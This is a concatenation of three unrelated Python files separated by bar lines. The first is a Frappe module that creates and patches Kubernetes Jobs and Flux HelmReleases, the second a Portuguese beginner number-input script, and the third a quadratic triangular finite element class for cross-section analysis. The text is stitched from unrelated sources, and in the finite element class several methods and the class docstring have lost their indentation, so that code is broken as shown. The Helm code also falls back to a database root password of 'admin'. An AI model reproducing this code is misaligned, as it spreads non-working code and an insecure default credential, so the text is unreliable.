                "git_repo": git_repo,
                "git_branch": git_branch,
            },
        }
        # NOTE(review): getattr without a default raises AttributeError for
        # exceptions that lack ``reason`` — other functions here pass None.
        reason = getattr(e, "reason")
        if reason:
            out["reason"] = reason
        frappe.log_error(out, "Exception: BatchV1Api->create_namespaced_job")
        return out
def get_job_status(job_name):
    """Read the named Job in our namespace; return it as plain data, or an
    error dict (with ``error``/``function_name``/``params``) on failure."""
    load_config()
    batch_v1 = client.BatchV1Api()
    try:
        job = batch_v1.read_namespaced_job(name=job_name, namespace=get_namespace())
        return to_dict(job)
    except (ApiException, Exception) as e:
        out = {
            "error": e,
            "function_name": "get_job_status",
            "params": {"job_name": job_name},
        }
        # Bug fix: supply a default so non-API exceptions without ``reason``
        # do not raise AttributeError inside the error handler (matches
        # delete_helm_release / get_helm_release).
        reason = getattr(e, "reason", None)
        if reason:
            out["reason"] = reason
        frappe.log_error(out, "Exception: BatchV1Api->read_namespaced_job")
        return out
def create_helm_release(improvement: "Improvement", site_name, site_password):
    """Create a HelmRelease custom object deploying the improvement's images
    via the erpnext chart, including creation of a fresh site.

    :param improvement: Improvement document (name and app_name drive the release)
    :param site_name: hostname of the site to create (also used for ingress)
    :param site_password: Administrator password for the new site
    :return: created object as plain data, or an error dict on failure
    """
    # Connection settings with local-cluster defaults.
    db_root_user = frappe.get_conf().get("db_root_user", "root")
    db_root_password = frappe.get_conf().get("db_root_password", "admin")
    mariadb_host = frappe.get_conf().get(
        "mariadb_host", "mariadb.mariadb.svc.cluster.local"
    )
    redis_queue_host = frappe.get_conf().get(
        "redis_queue_host", "redis-master.redis.svc.cluster.local:6379/0"
    )
    redis_cache_host = frappe.get_conf().get(
        "redis_cache_host", "redis-master.redis.svc.cluster.local:6379/1"
    )
    redis_socketio_host = frappe.get_conf().get(
        "redis_socketio_host", "redis-master.redis.svc.cluster.local:6379/2"
    )
    load_config()
    crd = client.CustomObjectsApi()
    install_apps = None
    if improvement.app_name == "erpnext":
        install_apps = frappe.get_conf().get("install_apps", "erpnext")
    body = {
        "kind": "HelmRelease",
        "apiVersion": "helm.fluxcd.io/v1",
        "metadata": client.V1ObjectMeta(
            namespace=get_namespace(),
            name=improvement.name.lower(),
        ),
        "spec": {
            "chart": {
                "repository": "https://helm.erpnext.com",
                "name": "erpnext",
                # Use >=3.2.5
                "version": "3.2.5",
            },
            "values": {
                "nginxImage": {
                    "repository": f"{get_container_registry()}/{improvement.app_name}-nginx",
                    "tag": improvement.name,
                    "pullPolicy": "Always",
                },
                "pythonImage": {
                    "repository": f"{get_container_registry()}/{improvement.app_name}-worker",
                    "tag": improvement.name,
                    "pullPolicy": "Always",
                },
                "mariadbHost": mariadb_host,
                "dbRootPassword": db_root_password,
                # Bug fix: these previously hard-coded the default hosts,
                # silently ignoring any redis_*_host values set in site config.
                "redisQueueHost": redis_queue_host,
                "redisCacheHost": redis_cache_host,
                "redisSocketIOHost": redis_socketio_host,
                "persistence": {
                    "logs": {"storageClass": "nfs"},
                    "worker": {"storageClass": "nfs"},
                },
                "createSite": {
                    "enabled": True,
                    "siteName": site_name,
                    "dbRootPassword": db_root_password,
                    "dbRootUser": db_root_user,
                    "adminPassword": site_password,
                    "installApps": install_apps,
                    "dropSiteOnUninstall": True,
                },
                "ingress": {
                    "enabled": True,
                    "hosts": [
                        {
                            "host": site_name,
                            "paths": [
                                {
                                    "path": "/",
                                    "pathType": "ImplementationSpecific",
                                }
                            ],
                        },
                    ],
                },
            },
        },
    }
    if not frappe.get_conf().get("developer_mode"):
        # Production: add TLS for the site host and registry pull credentials.
        wildcard_tls_secret = frappe.get_conf().get(
            "wildcard_tls_secret", "wildcard-example-com-tls"
        )
        body["spec"]["values"]["ingress"]["tls"] = [
            {
                "secretName": wildcard_tls_secret,
                "hosts": [site_name],
            }
        ]
        image_pull_secrets = frappe.get_conf().get("container_push_secret", "regcred")
        body["spec"]["values"]["imagePullSecrets"] = [{"name": image_pull_secrets}]
    try:
        res = crd.create_namespaced_custom_object(
            "helm.fluxcd.io", "v1", get_namespace(), "helmreleases", body, pretty=True
        )
        return to_dict(res)
    except (ApiException, Exception) as e:
        out = {
            "error": e,
            "function_name": "create_helm_release",
            "params": {"improvement": improvement.as_dict()},
        }
        # Bug fix: default prevents AttributeError for exceptions without ``reason``.
        reason = getattr(e, "reason", None)
        if reason:
            out["reason"] = reason
        frappe.log_error(
            out, "Exception: CustomObjectsApi->create_namespaced_custom_object"
        )
        return out
def update_helm_release(improvement_name):
    """Patch the improvement's HelmRelease to run a (backup-less) migrate job;
    the fresh timestamp value changes the spec, presumably to force the
    release to re-reconcile."""
    migration_timestamp = str(round(time.time()))
    load_config()
    crd = client.CustomObjectsApi()
    body = {
        "spec": {
            "values": {
                "migrateJob": {"enable": True, "backup": False},
                "migration-timestamp": migration_timestamp,
            },
        },
    }
    try:
        res = crd.patch_namespaced_custom_object(
            "helm.fluxcd.io",
            "v1",
            get_namespace(),
            "helmreleases",
            improvement_name.lower(),
            body,
        )
        return to_dict(res)
    except (ApiException, Exception) as e:
        out = {
            "error": e,
            "function_name": "update_helm_release",
            "params": {"improvement_name": improvement_name},
        }
        # Bug fix: default prevents AttributeError for exceptions without ``reason``.
        reason = getattr(e, "reason", None)
        if reason:
            out["reason"] = reason
        # Bug fix: the log title previously said "BatchV1Api->read_namespaced_job"
        # (copied from get_job_status); log the call that actually failed.
        frappe.log_error(
            out, "Exception: CustomObjectsApi->patch_namespaced_custom_object"
        )
        return out
def delete_helm_release(improvement_name):
    """Delete the HelmRelease custom object for the given improvement;
    returns the API response as plain data, or an error dict on failure."""
    load_config()
    custom_api = client.CustomObjectsApi()
    try:
        deleted = custom_api.delete_namespaced_custom_object(
            "helm.fluxcd.io",
            "v1",
            get_namespace(),
            "helmreleases",
            improvement_name,
        )
        return to_dict(deleted)
    except (ApiException, Exception) as e:
        out = {
            "error": e,
            "function_name": "delete_helm_release",
            "params": {"improvement_name": improvement_name},
        }
        reason = getattr(e, "reason", None)
        if reason:
            out["reason"] = reason
        frappe.log_error(
            out, "Exception: CustomObjectsApi->delete_namespaced_custom_object"
        )
        return out
def delete_job(job_name):
    """Delete the named Job in our namespace; return the API response as
    plain data, or an error dict on failure."""
    load_config()
    batch_v1 = client.BatchV1Api()
    try:
        job = batch_v1.delete_namespaced_job(name=job_name, namespace=get_namespace())
        return to_dict(job)
    except (ApiException, Exception) as e:
        out = {
            "error": e,
            "function_name": "delete_job",
            "params": {"job_name": job_name},
        }
        # Bug fix: supply a default so non-API exceptions without ``reason``
        # do not raise AttributeError inside the error handler.
        reason = getattr(e, "reason", None)
        if reason:
            out["reason"] = reason
        frappe.log_error(out, "Exception: BatchV1Api->delete_namespaced_job")
        return out
def get_helm_release(improvement_name):
    """Fetch the HelmRelease custom object for the given improvement;
    returns it as plain data, or an error dict on failure."""
    load_config()
    custom_api = client.CustomObjectsApi()
    try:
        release = custom_api.get_namespaced_custom_object(
            "helm.fluxcd.io",
            "v1",
            get_namespace(),
            "helmreleases",
            improvement_name,
        )
        return to_dict(release)
    except (ApiException, Exception) as e:
        out = {
            "error": e,
            "function_name": "get_helm_release",
            "params": {"improvement_name": improvement_name},
        }
        reason = getattr(e, "reason", None)
        if reason:
            out["reason"] = reason
        frappe.log_error(
            out, "Exception: CustomObjectsApi->get_namespaced_custom_object"
        )
        return out
def rollout_deployment(deployment_name):
    """Trigger a rolling restart of a deployment by patching its pod template
    with a fresh ``kubectl.kubernetes.io/restartedAt`` annotation."""
    load_config()
    apps_api = client.AppsV1Api()
    restarted_at = datetime.datetime.utcnow().isoformat("T") + "Z"
    patch = {
        "spec": {
            "template": {
                "metadata": {
                    "annotations": {
                        "kubectl.kubernetes.io/restartedAt": restarted_at
                    }
                },
            },
        },
    }
    try:
        res = apps_api.patch_namespaced_deployment(
            deployment_name,
            get_namespace(),
            patch,
        )
        return to_dict(res)
    except (ApiException, Exception) as e:
        out = {
            "error": e,
            "function_name": "rollout_deployment",
            "params": {"deployment_name": deployment_name},
        }
        reason = getattr(e, "reason", None)
        if reason:
            out["reason"] = reason
        frappe.log_error(out, "Exception: AppsV1Api->patch_namespaced_deployment")
        return out
|
# Read integers until the user enters 0 (which is also stored), then echo
# the numbers back and report whether an even or odd amount was entered.
entrada = []
while True:
    entrada.append(int(input("Digite um número: ")))
    if entrada[-1] == 0:
        break
print("\n\nVocê digitou 0 e encerrou o programa!")
print("\nOs números que você digitou foram:\n")
for numero in entrada:
    print(numero)
if len(entrada) % 2 == 0:
    print("\nVocê digitou uma quantidade PAR de números!")
else:
    print("\nVocê digitou uma quantidade ÍMPAR de números!")
|
import numpy as np
class Tri6:
"""Class for a six noded quadratic triangular element.
Provides methods for the calculation of section properties based on the finite element method.
:param int el_id: Unique element id
:param coords: A 2 x 6 array of the coordinates of the tri-6 nodes. The first three columns
relate to the vertices of the triangle and the last three columns correspond to the
mid-nodes.
:type coords: :class:`numpy.ndarray`
:param node_ids: A list of the global node ids for the current element
:type node_ids: list[int]
:param material: Material object for the current finite element.
:type material: :class:`~sectionproperties.pre.pre.Material`
:cvar int el_id: Unique element id
:cvar coords: A 2 x 6 array of the coordinates of the tri-6 nodes. The first three columns
relate to the vertices of the triangle and the last three columns correspond to the
mid-nodes.
:vartype coords: :class:`numpy.ndarray`
:cvar node_ids: A list of the global node ids for the current element
:vartype node_ids: list[int]
:cvar material: Material of the current finite element.
:vartype material: :class:`~sectionproperties.pre.pre.Material`
"""
    def __init__(self, el_id, coords, node_ids, material):
        """Inits the Tri6 class."""
        self.el_id = el_id          # unique element id
        self.coords = coords        # 2 x 6 array of nodal coordinates
        self.node_ids = node_ids    # global node ids for this element
        self.material = material    # material assigned to this element
    def geometric_properties(self):
        """Calculates the geometric properties for the current finite element.
        :return: Tuple containing the geometric properties and the elastic and shear moduli of the
            element: *(area, qx, qy, ixx, iyy, ixy, e, g)*
        :rtype: tuple(float)
        """
        # initialise geometric properties
        area = 0
        qx = 0
        qy = 0
        ixx = 0
        iyy = 0
        ixy = 0
        # Gauss points for 6 point Gaussian integration
        gps = gauss_points(6)
        # loop through each Gauss point
        for gp in gps:
            # determine shape function, shape function derivative and jacobian
            (N, _, j) = shape_function(self.coords, gp)
            # gp[0] scales each quadrature contribution; j is the jacobian.
            area += gp[0] * j
            # first moments of area (coords row 0 = x, row 1 = y)
            qx += gp[0] * np.dot(N, np.transpose(self.coords[1, :])) * j
            qy += gp[0] * np.dot(N, np.transpose(self.coords[0, :])) * j
            # second moments of area
            ixx += gp[0] * np.dot(N, np.transpose(self.coords[1, :])) ** 2 * j
            iyy += gp[0] * np.dot(N, np.transpose(self.coords[0, :])) ** 2 * j
            ixy += (
                gp[0] * np.dot(N, np.transpose(self.coords[1, :])) * np.dot(
                    N, np.transpose(self.coords[0, :])) * j
            )
        return (
            area, qx, qy, ixx, iyy, ixy, self.material.elastic_modulus, self.material.shear_modulus
        )
    def torsion_properties(self):
        """Calculates the element stiffness matrix used for warping analysis and the torsion load
        vector.
        :return: Element stiffness matrix *(k_el)* and element torsion load vector *(f_el)*
        :rtype: tuple(:class:`numpy.ndarray`, :class:`numpy.ndarray`)
        """
        # initialise stiffness matrix and load vector
        k_el = 0
        f_el = 0
        # Gauss points for 6 point Gaussian integration
        gps = gauss_points(6)
        for gp in gps:
            # determine shape function, shape function derivative and jacobian
            (N, B, j) = shape_function(self.coords, gp)
            # determine x and y position at Gauss point
            Nx = np.dot(N, np.transpose(self.coords[0, :]))
            Ny = np.dot(N, np.transpose(self.coords[1, :]))
            # calculated modulus weighted stiffness matrix and load vector
            k_el += gp[0] * np.dot(np.transpose(B), B) * j * (self.material.elastic_modulus)
            f_el += (
                gp[0] * np.dot(np.transpose(B), np.transpose(np.array([Ny, -Nx]))) *
                j * self.material.elastic_modulus
            )
        return (k_el, f_el)
    def shear_load_vectors(self, ixx, iyy, ixy, nu):
        """Calculates the element shear load vectors used to evaluate the shear functions.
        :param float ixx: Second moment of area about the centroidal x-axis
        :param float iyy: Second moment of area about the centroidal y-axis
        :param float ixy: Second moment of area about the centroidal xy-axis
        :param float nu: Effective Poisson's ratio for the cross-section
        :return: Element shear load vector psi *(f_psi)* and phi *(f_phi)*
        :rtype: tuple(:class:`numpy.ndarray`, :class:`numpy.ndarray`)
        """
        # initialise force vectors
        f_psi = 0
        f_phi = 0
        # Gauss points for 6 point Gaussian integration
        gps = gauss_points(6)
        for gp in gps:
            # determine shape function, shape function derivative and jacobian
            (N, B, j) = shape_function(self.coords, gp)
            # determine x and y position at Gauss point
            Nx = np.dot(N, np.transpose(self.coords[0, :]))
            Ny = np.dot(N, np.transpose(self.coords[1, :]))
            # determine shear parameters (intermediate terms d1/d2 for psi,
            # h1/h2 for phi, built from the second moments of area)
            r = Nx ** 2 - Ny ** 2
            q = 2 * Nx * Ny
            d1 = ixx * r - ixy * q
            d2 = ixy * r + ixx * q
            h1 = -ixy * r + iyy * q
            h2 = -iyy * r - ixy * q
            # accumulate the modulus-weighted load vector contributions
            f_psi += (
                gp[0] * (nu / 2 * np.transpose(np.transpose(B).dot(np.array([[d1], [d2]])))[0] +
                         2 * (1 + nu) * np.transpose(N) * (ixx * Nx - ixy * Ny)) * j *
                self.material.elastic_modulus
            )
            f_phi += (
                gp[0] * (nu / 2 * np.transpose(np.transpose(B).dot(np.array([[h1], [h2]])))[0] +
                         2 * (1 + nu) * np.transpose(N) * (iyy * Ny - ixy * Nx)) * j *
                self.material.elastic_modulus
            )
        return (f_psi, f_phi)
    def shear_warping_integrals(self, ixx, iyy, ixy, omega):
        """Calculates the element shear centre and warping integrals required for shear analysis of
        the cross-section.
        :param float ixx: Second moment of area about the centroidal x-axis
        :param float iyy: Second moment of area about the centroidal y-axis
        :param float ixy: Second moment of area about the centroidal xy-axis
        :param omega: Values of the warping function at the element nodes
        :type omega: :class:`numpy.ndarray`
        :return: Shear centre integrals about the x and y-axes *(sc_xint, sc_yint)*, warping
            integrals *(q_omega, i_omega, i_xomega, i_yomega)*
        :rtype: tuple(float, float, float, float, float, float)
        """
        # initialise integrals
        sc_xint = 0
        sc_yint = 0
        q_omega = 0
        i_omega = 0
        i_xomega = 0
        i_yomega = 0
        # Gauss points for 6 point Gaussian integration
        gps = gauss_points(6)
        for gp in gps:
            # determine shape function, shape function derivative and jacobian
            (N, B, j) = shape_function(self.coords, gp)
            # determine x and y position at Gauss point
            Nx = np.dot(N, np.transpose(self.coords[0, :]))
            Ny = np.dot(N, np.transpose(self.coords[1, :]))
            # warping function value interpolated at the Gauss point
            Nomega = np.dot(N, np.transpose(omega))
            # shear centre integrals (modulus weighted)
            sc_xint += (
                gp[0] * (iyy * Nx + ixy * Ny) * (Nx ** 2 + Ny ** 2) *
                j * self.material.elastic_modulus
            )
            sc_yint += (
                gp[0] * (ixx * Ny + ixy * Nx) * (Nx ** 2 + Ny ** 2) *
                j * self.material.elastic_modulus
            )
            # warping integrals (modulus weighted)
            q_omega += gp[0] * Nomega * j * self.material.elastic_modulus
            i_omega += gp[0] * Nomega ** 2 * j * self.material.elastic_modulus
            i_xomega += gp[0] * Nx * Nomega * j * self.material.elastic_modulus
            i_yomega += gp[0] * Ny * Nomega * j * self.material.elastic_modulus
        return (sc_xint, sc_yint, q_omega, i_omega, i_xomega, i_yomega)
def shear_coefficients(self, ixx, iyy, ixy, psi_shear, phi_shear, nu):
"""Calculates the variables used to determine the shear deformation coefficients.
:param float ixx: Second moment of area about the centroidal x-axis
:param float iyy: Second moment of area about the centroidal y-axis
:param float ixy: Second moment of area about the centroidal xy-axis
:param psi_shear: Values of the psi shear function at the element nodes
:type psi_shear: :class:`numpy.ndarray`
:param phi_shear: Values of the phi shear function at the element nodes
:type phi_shear: :class:`numpy.ndarray`
:param float nu: Effective Poisson's ratio for the cross-section
:return: Shear deformation variables *(kappa_x, kappa_y, kappa_xy)*
:rtype: tuple(float, float, float)
"""
# initialise properties
kappa_x = 0
kappa_y = 0
kappa_xy = 0
# Gauss points for 6 point Gaussian integration
gps = gauss_points(6)
for gp in gps:
# determine shape function, shape function derivative and jacobian
(N, B, j) = shape_function(self.coords, gp)
# determine x and y position at Gauss point
Nx = np.dot(N, np.transpose(self.coords[0, :]))
Ny = np.dot(N, np.transpose(self.coords[1, :]))
# determine shear parameters
r = Nx ** 2 - Ny ** 2
q = 2 * Nx * Ny
d1 = ixx * r - ixy * q
d2 = ixy * r + ixx * q
h1 = -ixy * r + iyy * q
h2 = -iyy * r - ixy * q
kappa_x += (
gp[0] * (psi_shear.dot(np.transpose(B)) - nu / 2 * np.array([d1, d2])).dot(
B.dot(psi_shear) - nu / 2 * np.array([d1, d2])) * j *
self.material.elastic_modulus
)
kappa_y += (
gp[0] * (phi_shear.dot(np.transpose(B)) - nu / 2 * np.array([h1, h2])).dot(
B.dot(phi_shear) - nu / 2 * np.array([h1, h2])) * j *
self.material.elastic_modulus
)
kappa_xy += (
gp[0] * (psi_shear.dot(np.transpose(B)) - nu / 2 * np.array([d1, d2])).dot(
B.dot(phi_shear) - nu / 2 * np.array([h1, h2])) * j *
self.material.elastic_modulus
)
return (kappa_x, kappa_y, kappa_xy)
def monosymmetry_integrals(self, phi):
"""Calculates the integrals used to evaluate the monosymmetry constant about both global
axes and both prinicipal axes.
:param float phi: Principal bending axis angle
:return: Integrals used to evaluate the monosymmetry constants *(int_x, int_y, int_11,
int_22)*
:rtype: tuple(float, float, float, float)
"""
# initialise properties
int_x = 0
int_y = 0
int_11 = 0
int_22 = 0
# Gauss points for 6 point Gaussian integration
gps = gauss_points(6)
for gp in gps:
# determine shape function and jacobian
(N, _, j) = shape_function(self.coords, gp)
# determine x and y position at Gauss point
Nx = np.dot(N, np.transpose(self.coords[0, :]))
Ny = np.dot(N, np.transpose(self.coords[1, :]))
# determine 11 and 22 position at Gauss point
(Nx_11, Ny_22) = principal_coordinate(phi, Nx, Ny)
# weight the monosymmetry integrals by the section elastic modulus
int_x += gp[0] * (Nx * Nx * Ny + Ny * Ny * Ny) * j * self.material.elastic_modulus
int_y += gp[0] * (Ny * Ny * Nx + Nx * Nx * Nx) * j * self.material.elastic_modulus
int_11 += (
gp[0] * (Nx_11 * Nx_11 * Ny_22 + Ny_22 * Ny_22 * Ny_22) * j *
self.material.elastic_modulus
)
int_22 += (
gp[0] * (Ny_22 * Ny_22 * Nx_11 + Nx_11 * Nx_11 * Nx_11) * j *
self.material.elastic_modulus
)
return (int_x, int_y, int_11, int_22)
def plastic_properties(self, u, p):
"""Calculates total force resisted by the element when subjected to a stress equal to the
yield strength. Also returns the modulus weighted area and first moments of area, and
determines whether or not the element is above or below the line defined by the unit
vector *u* and point *p*.
:param u: Unit vector in the direction of the line
:type u: :class:`numpy.ndarray`
:param p: Point on the line
:type p: :class:`numpy.ndarray`
:return: Element force *(force)*, modulus weighted area properties *(ea, e.qx, e.qy)* and
whether or not the element is above the line
:rtype: tuple(float, float, float, float, bool)
"""
# initialise geometric properties
e = self.material.elastic_modulus
area = 0
qx = 0
qy = 0
force = 0
# Gauss points for 3 point Gaussian integration
gps = gauss_points(3)
# loop through each Gauss point
for gp in gps:
# determine shape function, shape function derivative and jacobian
(N, _, j) = shape_function(self.coords, gp)
area += gp[0] * j
qx += gp[0] * np.dot(N, np.transpose(self.coords[1, :])) * j
qy += gp[0] * np.dot(N, np.transpose(self.coords[0, :])) * j
force += gp[0] * j * self.material.yield_strength
# calculate element centroid
(cx, cy) = (qy / area, qx / area)
# determine if the element is above the line p + u
is_above = point_above_line(u, p[0], p[1], cx, cy)
return (force, area * e, qx * e, qy * e, is_above)
    def element_stress(self, N, Mxx, Myy, M11, M22, Mzz, Vx, Vy, ea, cx, cy, ixx, iyy, ixy, i11,
                       i22, phi, j, nu, omega, psi_shear, phi_shear, Delta_s):
        r"""Calculates the stress within an element resulting from a specified loading. Also returns
        the shape function weights.
        :param float N: Axial force
        :param float Mxx: Bending moment about the centroidal xx-axis
        :param float Myy: Bending moment about the centroidal yy-axis
        :param float M11: Bending moment about the centroidal 11-axis
        :param float M22: Bending moment about the centroidal 22-axis
        :param float Mzz: Torsion moment about the centroidal zz-axis
        :param float Vx: Shear force acting in the x-direction
        :param float Vy: Shear force acting in the y-direction
        :param float ea: Modulus weighted area
        :param float cx: x position of the elastic centroid
        :param float cy: y position of the elastic centroid
        :param float ixx: Second moment of area about the centroidal x-axis
        :param float iyy: Second moment of area about the centroidal y-axis
        :param float ixy: Second moment of area about the centroidal xy-axis
        :param float i11: Second moment of area about the principal 11-axis
        :param float i22: Second moment of area about the principal 22-axis
        :param float phi: Principal bending axis angle
        :param float j: St. Venant torsion constant
        :param float nu: Effective Poisson's ratio for the cross-section
        :param omega: Values of the warping function at the element nodes
        :type omega: :class:`numpy.ndarray`
        :param psi_shear: Values of the psi shear function at the element nodes
        :type psi_shear: :class:`numpy.ndarray`
        :param phi_shear: Values of the phi shear function at the element nodes
        :type phi_shear: :class:`numpy.ndarray`
        :param float Delta_s: Cross-section shear factor
        :return: Tuple containing element stresses and integration weights
            (:math:`\sigma_{zz,n}`, :math:`\sigma_{zz,mxx}`,
            :math:`\sigma_{zz,myy}`, :math:`\sigma_{zz,m11}`,
            :math:`\sigma_{zz,m22}`, :math:`\sigma_{zx,mzz}`,
            :math:`\sigma_{zy,mzz}`, :math:`\sigma_{zx,vx}`,
            :math:`\sigma_{zy,vx}`, :math:`\sigma_{zx,vy}`,
            :math:`\sigma_{zy,vy}`, :math:`w_i`)
        :rtype: tuple(:class:`numpy.ndarray`, :class:`numpy.ndarray`, ...)
        """
        # calculate axial stress (uniform across the element; evaluated at the 6 nodes)
        sig_zz_n = N * np.ones(6) * self.material.elastic_modulus / ea
        # initialise stresses at the gauss points (one row per Gauss point;
        # bending terms are scalar, torsion/shear terms have x and y components)
        sig_zz_mxx_gp = np.zeros((6, 1))
        sig_zz_myy_gp = np.zeros((6, 1))
        sig_zz_m11_gp = np.zeros((6, 1))
        sig_zz_m22_gp = np.zeros((6, 1))
        sig_zxy_mzz_gp = np.zeros((6, 2))
        sig_zxy_vx_gp = np.zeros((6, 2))
        sig_zxy_vy_gp = np.zeros((6, 2))
        # Gauss points for 6 point Gaussian integration
        gps = gauss_points(6)
        for (i, gp) in enumerate(gps):
            # determine x and y positions with respect to the centroidal axis
            coords_c = np.zeros((2, 6))
            coords_c[0, :] = self.coords[0, :] - cx
            coords_c[1, :] = self.coords[1, :] - cy
            # determine shape function, shape function derivative and jacobian
            # NOTE(review): N (shape function array) shadows the axial force
            # parameter N here; the axial stress has already been computed above
            (N, B, _) = shape_function(coords_c, gp)
            # determine x and y position at Gauss point
            Nx = np.dot(N, np.transpose(coords_c[0, :]))
            Ny = np.dot(N, np.transpose(coords_c[1, :]))
            # determine 11 and 22 position at Gauss point
            (Nx_11, Ny_22) = principal_coordinate(phi, Nx, Ny)
            # determine shear parameters
            r = Nx ** 2 - Ny ** 2
            q = 2 * Nx * Ny
            d1 = ixx * r - ixy * q
            d2 = ixy * r + ixx * q
            h1 = -ixy * r + iyy * q
            h2 = -iyy * r - ixy * q
            # calculate element bending stresses (generalised bending formula)
            sig_zz_mxx_gp[i, :] = (
                self.material.elastic_modulus * (-(ixy * Mxx) / (ixx * iyy - ixy ** 2) * Nx + (
                    iyy * Mxx) / (ixx * iyy - ixy ** 2) * Ny)
            )
            sig_zz_myy_gp[i, :] = (
                self.material.elastic_modulus * (-(ixx * Myy) / (ixx * iyy - ixy ** 2) * Nx + (
                    ixy * Myy) / (ixx * iyy - ixy ** 2) * Ny)
            )
            sig_zz_m11_gp[i, :] = self.material.elastic_modulus * M11 / i11 * Ny_22
            sig_zz_m22_gp[i, :] = self.material.elastic_modulus * -M22 / i22 * Nx_11
            # torsion and shear stresses are only evaluated when the
            # corresponding action is non-zero (saves the matrix products)
            if Mzz != 0:
                sig_zxy_mzz_gp[i, :] = (
                    self.material.elastic_modulus * Mzz / j * (B.dot(omega) - np.array([Ny, -Nx]))
                )
            if Vx != 0:
                sig_zxy_vx_gp[i, :] = (
                    self.material.elastic_modulus * Vx / Delta_s * (
                        B.dot(psi_shear) - nu / 2 * np.array([d1, d2]))
                )
            if Vy != 0:
                sig_zxy_vy_gp[i, :] = (
                    self.material.elastic_modulus * Vy / Delta_s * (
                        B.dot(phi_shear) - nu / 2 * np.array([h1, h2]))
                )
        # extrapolate results from the Gauss points to the element nodes
        sig_zz_mxx = extrapolate_to_nodes(sig_zz_mxx_gp[:, 0])
        sig_zz_myy = extrapolate_to_nodes(sig_zz_myy_gp[:, 0])
        sig_zz_m11 = extrapolate_to_nodes(sig_zz_m11_gp[:, 0])
        sig_zz_m22 = extrapolate_to_nodes(sig_zz_m22_gp[:, 0])
        sig_zx_mzz = extrapolate_to_nodes(sig_zxy_mzz_gp[:, 0])
        sig_zy_mzz = extrapolate_to_nodes(sig_zxy_mzz_gp[:, 1])
        sig_zx_vx = extrapolate_to_nodes(sig_zxy_vx_gp[:, 0])
        sig_zy_vx = extrapolate_to_nodes(sig_zxy_vx_gp[:, 1])
        sig_zx_vy = extrapolate_to_nodes(sig_zxy_vy_gp[:, 0])
        sig_zy_vy = extrapolate_to_nodes(sig_zxy_vy_gp[:, 1])
        # also return the Gauss point weights (used by callers for averaging)
        return (sig_zz_n, sig_zz_mxx, sig_zz_myy, sig_zz_m11, sig_zz_m22, sig_zx_mzz, sig_zy_mzz,
                sig_zx_vx, sig_zy_vx, sig_zx_vy, sig_zy_vy, gps[:, 0])
def point_within_element(self, pt):
"""Determines whether a point lies within the current element.
:param pt: Point to check *(x, y)*
:type pt: list[float, float]
:return: Whether the point lies within an element
:rtype: bool
"""
px = pt[0]
py = pt[1]
# get coordinates of corner points
x1 = self.coords[0][0]
y1 = self.coords[1][0]
x2 = self.coords[0][1]
y2 = self.coords[1][1]
x3 = self.coords[0][2]
y3 = self.coords[1][2]
# compute variables alpha, beta and gamma
alpha = (
((y2 - y3) * (px - x3) + (x3 - x2) * (py - y3)) /
((y2 - y3) * (x1 - x3) + (x3 - x2) * (y1 - y3))
)
beta = (
((y3 - y1) * (px - x3) + (x1 - x3) * (py - y3)) /
((y2 - y3) * (x1 - x3) + (x3 - x2) * (y1 - y3))
)
gamma = 1.0 - alpha - beta
# if the point lies within an element
if alpha >= 0 and beta >= 0 and gamma >= 0:
return True
else:
return False
def gauss_points(n):
    """Returns the Gaussian weights and locations for *n* point Gaussian integration of a
    quadratic triangular element.

    :param int n: Number of Gauss points (1, 3 or 6)
    :return: An *n x 4* matrix consisting of the integration weight and the eta, xi and zeta
        locations for *n* Gauss points
    :rtype: :class:`numpy.ndarray`
    """
    if n == 1:
        # single point rule: weight 1 at the element centroid
        return np.array([[1, 1.0 / 3, 1.0 / 3, 1.0 / 3]])

    if n == 3:
        # three point rule: equal weights, one point biased towards each vertex
        return np.array([
            [1.0 / 3, 2.0 / 3, 1.0 / 6, 1.0 / 6],
            [1.0 / 3, 1.0 / 6, 2.0 / 3, 1.0 / 6],
            [1.0 / 3, 1.0 / 6, 1.0 / 6, 2.0 / 3]
        ])

    if n == 6:
        # six point rule: two symmetric orbits of three points each
        g1 = 1.0 / 18 * (8 - np.sqrt(10) + np.sqrt(38 - 44 * np.sqrt(2.0 / 5)))
        g2 = 1.0 / 18 * (8 - np.sqrt(10) - np.sqrt(38 - 44 * np.sqrt(2.0 / 5)))
        w1 = (620 + np.sqrt(213125 - 53320 * np.sqrt(10))) / 3720
        w2 = (620 - np.sqrt(213125 - 53320 * np.sqrt(10))) / 3720

        return np.array([
            [w2, 1 - 2 * g2, g2, g2],
            [w2, g2, 1 - 2 * g2, g2],
            [w2, g2, g2, 1 - 2 * g2],
            [w1, g1, g1, 1 - 2 * g1],
            [w1, 1 - 2 * g1, g1, g1],
            [w1, g1, 1 - 2 * g1, g1]
        ])
def shape_function(coords, gauss_point):
    """Computes shape functions, shape function derivatives and the determinant of the Jacobian
    matrix for a tri 6 element at a given Gauss point.

    :param coords: Global coordinates of the quadratic triangle vertices [2 x 6]
    :type coords: :class:`numpy.ndarray`
    :param gauss_point: Gaussian weight and isoparametric location of the Gauss point
    :type gauss_point: :class:`numpy.ndarray`
    :return: The value of the shape functions *N(i)* at the given Gauss point [1 x 6], the
        derivative of the shape functions in the j-th global direction *B(i,j)* [2 x 6] and the
        determinant of the Jacobian matrix *j*
    :rtype: tuple(:class:`numpy.ndarray`, :class:`numpy.ndarray`, float)
    """
    # isoparametric (area) coordinates of the Gauss point
    (eta, xi, zeta) = (gauss_point[1], gauss_point[2], gauss_point[3])

    # quadratic triangle shape functions evaluated at the Gauss point
    N = np.array([
        eta * (2 * eta - 1),
        xi * (2 * xi - 1),
        zeta * (2 * zeta - 1),
        4 * eta * xi,
        4 * xi * zeta,
        4 * eta * zeta
    ])

    # shape function derivatives wrt the isoparametric coordinates
    B_iso = np.array([
        [4 * eta - 1, 0, 0, 4 * xi, 0, 4 * zeta],
        [0, 4 * xi - 1, 0, 4 * eta, 4 * zeta, 0],
        [0, 0, 4 * zeta - 1, 0, 4 * xi, 4 * eta]
    ])

    # assemble the Jacobian matrix and evaluate its scaled determinant
    J = np.vstack((np.ones((1, 3)), coords.dot(np.transpose(B_iso))))
    j = 0.5 * np.linalg.det(J)

    if j != 0:
        # map the isoparametric derivatives to cartesian coordinates
        P = np.linalg.inv(J).dot(np.array([[0, 0], [1, 0], [0, 1]]))
        B = np.transpose(np.transpose(B_iso).dot(P))
    else:
        # degenerate (zero area) element: return an empty B matrix
        B = np.zeros((2, 6))

    return (N, B, j)
def extrapolate_to_nodes(w):
    """Extrapolates results at six Gauss points to the six nodes of a quadratic triangular
    element.

    :param w: Result at the six Gauss points [1 x 6]
    :type w: :class:`numpy.ndarray`
    :return: Extrapolated nodal values at the six nodes [1 x 6]
